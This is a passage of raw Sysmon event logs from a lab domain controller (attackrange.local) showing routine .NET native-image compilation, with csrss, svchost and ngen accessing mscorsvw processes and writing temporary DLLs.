ll.dll+51791 10341000x80000000000000007102Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.252{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45EC-6000-F302-000000009A01}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007101Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.252{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EC-6000-F302-000000009A01}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007100Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:56.190{08A6967A-45EC-6000-F202-000000009A01}3700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e74-0\UIAutomationProvider.dll2021-01-14 13:23:56.190 10341000x80000000000000007099Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.096{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EC-6000-F202-000000009A01}3700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007098Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.096{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45EC-6000-F202-000000009A01}3700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007097Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.096{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EC-6000-F202-000000009A01}3700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007096Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.049{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EC-6000-F102-000000009A01}5004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007095Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.034{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EC-6000-F102-000000009A01}5004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007094Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.034{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EC-6000-F102-000000009A01}5004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007130Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:57.924{08A6967A-45ED-6000-FB02-000000009A01}1200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\4b0-0\XamlBuildTask.dll2021-01-14 13:23:57.924 10341000x80000000000000007129Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:57.409{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45ED-6000-FB02-000000009A01}1200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007128Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:57.393{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45ED-6000-FB02-000000009A01}1200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007127Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:57.393{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45ED-6000-FB02-000000009A01}1200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007126Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:57.268{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45ED-6000-FA02-000000009A01}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007125Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:57.268{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45ED-6000-FA02-000000009A01}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007124Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:57.268{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45ED-6000-FA02-000000009A01}4804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007123Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:57.221{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45ED-6000-F902-000000009A01}4424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007122Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:57.206{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45ED-6000-F902-000000009A01}4424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007121Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:57.206{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45ED-6000-F902-000000009A01}4424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007120Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:57.143{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45ED-6000-F802-000000009A01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007119Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:57.143{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45ED-6000-F802-000000009A01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007118Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:57.143{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45ED-6000-F802-000000009A01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007117Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:57.096{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45ED-6000-F702-000000009A01}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007116Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:57.081{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45ED-6000-F702-000000009A01}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007115Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:57.081{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45ED-6000-F702-000000009A01}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007114Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:57.018{08A6967A-45EC-6000-F602-000000009A01}3404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d4c-0\WindowsFormsIntegration.dll2021-01-14 13:23:57.018 10341000x80000000000000007185Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 